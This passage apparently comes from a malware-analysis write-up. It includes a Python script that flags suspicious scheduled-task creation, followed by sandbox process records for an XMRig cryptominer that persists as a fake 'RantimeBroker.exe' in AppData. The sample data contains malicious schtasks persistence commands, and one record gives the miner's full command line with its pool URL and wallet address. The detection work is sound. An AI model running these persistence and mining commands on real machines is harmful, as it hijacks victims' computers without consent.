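    "/tr 'C:\\Users\\user\\AppData\\Roaming\\Windows\\RantimeBroker.exe' /f",
    '"C:\\Windows\\System32\\schtasks.exe" /create /sc DAILY /st 03:00 '
    '/tn "Acme Backup" /tr "C:\\Program Files\\Acme\\backup.exe" /f',
    'schtasks.exe /create /sc MINUTE /mo 5 /tn "Updater" '
    '/tr "C:\\Users\\user\\AppData\\Local\\Temp\\u.exe"',
    'schtasks.exe /delete /tn "Old Task" /f',
]

# Directories a standard user can write to; a scheduled binary living here is worth a look.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public|Downloads)\\", re.I)
# Task names that borrow Microsoft/Windows branding to blend into the Task Scheduler library.
MS_BRANDING = re.compile(r"\b(microsoft|windows)\b", re.I)
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
WATCHDOG_MINUTES = 5   # /sc MINUTE with /mo <= this is relaunch-if-killed persistence, not a job


def tokenize(cmdline):
    """Split a Windows command line, honouring both "..." and '...' quoting."""
    return [t[1:-1] if t[0] in "\"'" else t
            for t in re.findall(r"\"[^\"]*\"|'[^']*'|\S+", cmdline)]


def parse_schtasks(cmdline):
    """Return the switches of a 'schtasks /create' as a dict, or None for anything else."""
    toks = tokenize(cmdline)
    if not toks or "schtasks" not in toks[0].lower():
        return None
    args, i = {}, 1
    while i < len(toks):
        key = toks[i].lower()
        if key.startswith("/"):
            if i + 1 < len(toks) and not toks[i + 1].startswith("/"):
                args[key] = toks[i + 1]
                i += 2
                continue
            args[key] = True
        i += 1
    return args if "/create" in args else None


def interval_minutes(args):
    """Run interval implied by /sc and /mo, or None for non-interval schedules."""
    mod = args.get("/mo", "1")
    mod = int(mod) if isinstance(mod, str) and mod.isdigit() else 1
    return {"MINUTE": mod, "HOURLY": 60 * mod}.get(str(args.get("/sc", "")).upper())


def score_schtasks(cmdline):
    """Reasons a task creation looks like malware persistence (empty list = nothing notable)."""
    args = parse_schtasks(cmdline)
    if args is None:
        return []
    target = str(args.get("/tr", ""))
    name = str(args.get("/tn", ""))
    reasons = []
    every = interval_minutes(args)
    if every is not None and every <= WATCHDOG_MINUTES:
        reasons.append(f"re-runs every {every} min (watchdog-style persistence)")
    if USER_WRITABLE.search(target):
        reasons.append("task binary lives in a user-writable directory")
    if MS_BRANDING.search(name) and not target.lower().startswith(SYSTEM_DIRS):
        reasons.append("Microsoft/Windows-branded task name for a non-system binary")
    return reasons


def triage(events=SAMPLE_EVENTS):
    return {e: score_schtasks(e) for e in events}


if __name__ == "__main__":
    for cmd, reasons in triage().items():
        print(("ALERT " if reasons else "ok    ") + cmd[:80])
        for r in reasons:
            print("        -", r)
```

The report's command line trips all three checks; the daily backup task trips none, and the five-minute Temp-resident task trips two, which is the kind of graded output that is easier to tune than a single regex on "schtasks /create". On the host itself the same task is visible with schtasks /query /tn "Windows Service Microsoft Corporation" /v, and the RantimeBroker.exe copy has the same MD5 as zmql3v0y.exe in the process list below.
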
                                                                                                General

                                                                                                Start time:17:37:51
                                                                                                Start date:23/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:37:53
Start date: 23/02/2021
Path: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
Imagebase: 0xd80000
File size: 2611424 bytes
MD5 hash: F0ECEFED65B00699CC2B57BF81492F56
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.328721362.0000000003CD1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000003.317443395.00000000015F0000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 61%, ReversingLabs
Reputation: low

General

Start time: 17:37:58
Start date: 23/02/2021
Path: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe
Wow64 process (32bit): false
Commandline: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
Imagebase: 0x7ff652940000
File size: 6889640 bytes
MD5 hash: E95F766A3748042EFBF0F05D823F82B7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp, Author: Joe Security
• Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.324849643.0000020FCC35B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 16%, Metadefender
• Detection: 66%, ReversingLabs
Reputation: low

General

Start time: 17:37:59
Start date: 23/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:39:05
Start date: 23/02/2021
Path: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
Wow64 process (32bit):
Commandline: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
Imagebase:
File size: 2611424 bytes
MD5 hash: F0ECEFED65B00699CC2B57BF81492F56
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Disassembly

Code Analysis
